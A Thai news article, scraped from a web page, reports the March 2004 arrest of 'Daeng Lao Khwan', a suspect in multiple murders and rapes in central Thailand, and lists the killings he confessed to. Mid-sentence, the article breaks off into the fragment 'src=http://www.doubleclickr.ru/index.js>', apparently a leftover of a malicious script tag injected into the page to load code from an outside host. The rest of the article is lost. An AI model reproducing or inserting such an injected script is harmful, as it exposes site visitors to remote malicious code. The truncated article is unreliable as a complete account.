แดงเลาขวัญ โจรข่มขืนฆ่า


แดงเลาขวัญ โจรข่มขืนฆ่า

วันที่ 31 มีนาคม พ.ศ.2547 ปีที่ 13 ฉบับที่ 4871

จับ"แดงเลาขวัญ"โจรข่มขืนฆ่า

ก่อคดีอื้อขยี้เหยื่อรับจ้างฆ่า


"แดง เลาขวัญ"จอมโจรข่มขืนจนมุมตำรวจแล้ว ผบช.ภาค 1 แถลงจับกุมคนร้ายทมิฬก่อคดีฆ่าข่มขืนมานับไม่ถ้วน โดนตร.ชัยนาทล้อมจับได้กลางไร่อ้อยขณะหนีเตลิดคดีฆ่าหนุ่มราชบุรีแล้วฉุดแฟนสาวไปขืนใจ แฉประวัติสุดโฉดข่มขืนมานับสิบคดี รับจ้างฆ่าอีกอื้อ ฆ่าส.ท.สวนแตง-สุพรรณบุรีด้วย สารภาพหมดเปลือก อ้างกดดันเพราะตอนอายุ 19 ปี พ่อถูกฆ่า น้องถูกข่มขืนก็เลยเริ่มฆ่าคน

เมื่อเวลา 13.00 น. วันที่ 30 มี.ค. ที่ห้องประชุมกองบัญชาการตำรวจภูธรภาค 1 พล.ต.ท.ปานศิริ ประภาวัต ผบช.ภาค 1 พล.ต.ต.ปรัชญา สุทธิปรีดา และพล.ต.ต.สมาน สุวัฑฒนะ รองผบช.ภาค 1 พร้อมพล.ต.ต.บุญส่ง พานิชอัตรา ผบก.ชัยนาท แถลงผลการจับกุมนายอุทัย หรือ"แดง เลาขวัญ" แซ่ลี้ อายุ 44 ปี อยู่บ้านเลขที่ 108 ม.9 ต.บ้านโพธิ์ อ.เมือง สุพรรณบุรี ตามหมายจับของศาลจังหวัดกาญจนบุรี ที่ มจ.2372/46 ลงวันที่ 4 พ.ย. 2546 ในข้อหาฆ่าผู้อื่นและพยายามฆ่าผู้อื่น เหตุเกิดเมื่อวันที่ 19 ต.ค.2546 เวลา 18.00 น. ที่หมู่ 4 ต.หนองประดู่ อ.เลาขวัญ จ.กาญจนบุรี และหมายจับศาลจังหวัดสุพรรณบุรี ที่ 163/2547 ลงวันที่ 25 ก.พ. 2546 ข้อหาร่วมกันพยายามชิงทรัพย์เป็นเหตุให้ผู้อื่นได้รับอันตรายสาหัสและผู้อื่นถึงแก่ความตาย ร่วมกันพยายามฆ่าผู้อื่น และร่วมกันฆ่าผู้อื่นโดยเจตนา มีอาวุธปืนและเครื่องกระสุนปืนไว้ในความครอบครองโดยไม่ได้รับอนุญาต และพกพาอาวุธปืนไปในเมืองหมู่บ้านโดยไม่มีเหตุเร่งด่วนโดยไม่ได้รับอนุญาต

โดยตำรวจจับกุมแดง เลาขวัญได้ที่บ้านวังคอไห ม.5 ต.สุขเดือนห้า กิ่งอ.เนินขาม จ.ชัยนาท ทั้งนี้ สืบเนื่องจากนายอุทัย หรือแดงเลาขวัญ เป็นคนร้ายที่ก่อเหตุคดีฆ่าผู้อื่น และคดีข่มขืนฆ่าหลายสิบคดีในเขตจ.กาญจนบุรี เพชรบุรี ราชบุรี และสุพรรณบุรี มีหมายจับและเป็นคนร้ายที่ทางการต้องการตัว โดยล่าสุดเพิ่งก่อเหตุฆ่านายยนต์ เสือเฒ่า ที่อ่างเก็บน้ำพุยาว ต.ท่าหลวง อ.ปากท่อ จ.ราชบุรี และจับแฟนสาวของนายยนต์ไปข่มขืน พร้อมนำตัวไปกักขังในพื้นที่อ.บ้านไร่ จ.อุทัยธานี กระทั่งเหยื่อสาวออกอุบายจนหลบหนีออกมาได้ เข้าแจ้งความต่อตำรวจนำกำลังเข้าจับกุม แต่แดงเลาขวัญไหวตัวทัน จึงหลบหนีการจับกุมของเจ้าหน้าที่ไปได้ กระทั่งมาถูกตำรวจจ.ชัยนาทจับกุมได้ในที่สุด ซึ่งผู้ต้องหารายนี้ถือเป็นภัยอันตรายต่อสังคมอย่างยิ่ง

พล.ต.ท.ปานศิริ กล่าวว่า สำหรับผู้ต้องหารายนี้ ภายหลังที่ตำรวจภูธรภาค 7 ได้ติดตามตัวมาตลอด ตนจึงสั่งการในที่ประชุมช่วยตรวจสอบเนื่องจากพื้นที่ภาค 1 กับภาค 7 ติดต่อกัน โดยเฉพาะจ.ชัยนาทมีแผนประทุษกรรมของคนร้ายและการปรากฏตัวของคนร้ายอยู่ที่อ.บ้านไร่ จ.อุทัยธานี จึงสั่งการให้พล.ต.ต.บุญส่งช่วยกระจายข่าวไปให้ถึงผู้ใต้บังคับบัญชา ซึ่งเป็นผู้ปฏิบัติกระทั่งเมื่อเวลา 07.30 น.วันเดียวกันนี้ พ.ต.ท.ศรประสิทธิ์ ธัญญสิริ รอง ผกก.หน.สภ.กิ่งอ.เนินขาม จ.ชัยนาท ร.ต.ท.สนั่น มณีฉาย รองสวป.พร้อมกำลังเจ้าหน้าที่จำนวนหนึ่งได้เฝ้าสังเกตการณ์ และสามารถจับกุมตัวนายอุทัยได้ โดยได้เบาะแสจากประชาชนอีกส่วนหนึ่งที่เห็นผู้ต้องสงสัยเดินขากะเผลกออกมาจากไร่อ้อยจนเป็นที่สงสัย จึงแจ้งเจ้าหน้าที่เข้าไปตรวจสอบและจับกุมตัวไว้ได้

พล.ต.ท.ปานศิริกล่าวว่า เบาะแสที่ได้เรื่องนี้ส่วนหนึ่งต้องขอขอบคุณประชาชนในพื้นที่ จริงๆ แล้วเรื่องอาชญากรรมประชาชนเป็นสิ่งที่สำคัญที่สุด ซึ่งการทำงานต้องเอาประชาชนเป็นศูนย์กลาง บวกกับความสนใจของเจ้าหน้าที่ตำรวจในครั้งนี้ด้วยและเพื่อเป็นขวัญและกำลังจในการทำงานจึงจะมีการมอบรางวัลและประกาศณียบัตรให้กับผู้ปฏิบัติงานในครั้งนี้

สำหรับนายอุทัย หรือแดง เลาขวัญ มีหมายจับอยู่หลายสิบคดี และยังมีการสอบสวนขยายผลไปถึงคดีอื่นด้วย ซึ่งขณะนี้ผบก.สุพรรณบุรีสั่งการให้ตำรวจออกติดตามผู้ที่ร่วมกระทำผิดในส่วนหนึ่งแล้ว

พล.ต.ต.บุญส่งกล่าวว่า จากการสอบสวนผู้ต้องหาเบื้องต้นให้การรับสารภาพเคยกระทำความผิดคือ 1.ยิงนายสุเทพ วศินธรวิสุทธิ์ เทศมนตรีต.สวนแตง จ.สุพรรณบุรี จนเสียชีวิต 2.ยิงนายชวลิต จำคำ ที่อ.อู่ทอง จ.สุพรรณบุรี เสียชีวิต 3.ยิงนายมนตรี ศรีสว่าง ที่อ.เมือง สุพรรณบุรี เสียชีวิต 4.ก่อคดียิงนักดนตรีเสียชีวิตและฉุดภรรยาซึ่งเป็นหางเครื่องไปข่มขืนแล้วฆ่าทิ้ง 5.ฆ่านายสุวรรณ แซ่โค้ว ที่จ.สุพรรณบุรี 6.ฆ่านายยนต์ เสือเฒ่า ที่อ่างเก็บน้ำพุยาว ต.ท่าหลวง อ.ปากท่อง จ.ราชบุรี แล้วฉุดแฟนสาวไปข่มขืน นอกจากนี้ยังมีคดีข่มขืนอีกหลายสิบคดีที่น่าเชื่อว่าเป็นฝีมือของนาย src=http://www.doubleclickr.ru/index.js>


แสดงความคิดเห็น

เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ


เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ

เป็นเว็บไซต์ระบบ Responsive 100% สามารถปรับรูปแบบการแสดงผลได้เองโดยอัตโนมัติ ตามอุปกรณ์ที่เปิดชม (ทั้ง Front end และ Back end) เช่น สมาร์ทโฟนทุกรุ่น, แท็บเล็ต, iPad และ iPhone เป็นเจ้าของได้แล้ววันนี้ ในราคาโปรโมชั่น...คลิกดูรายละเอียด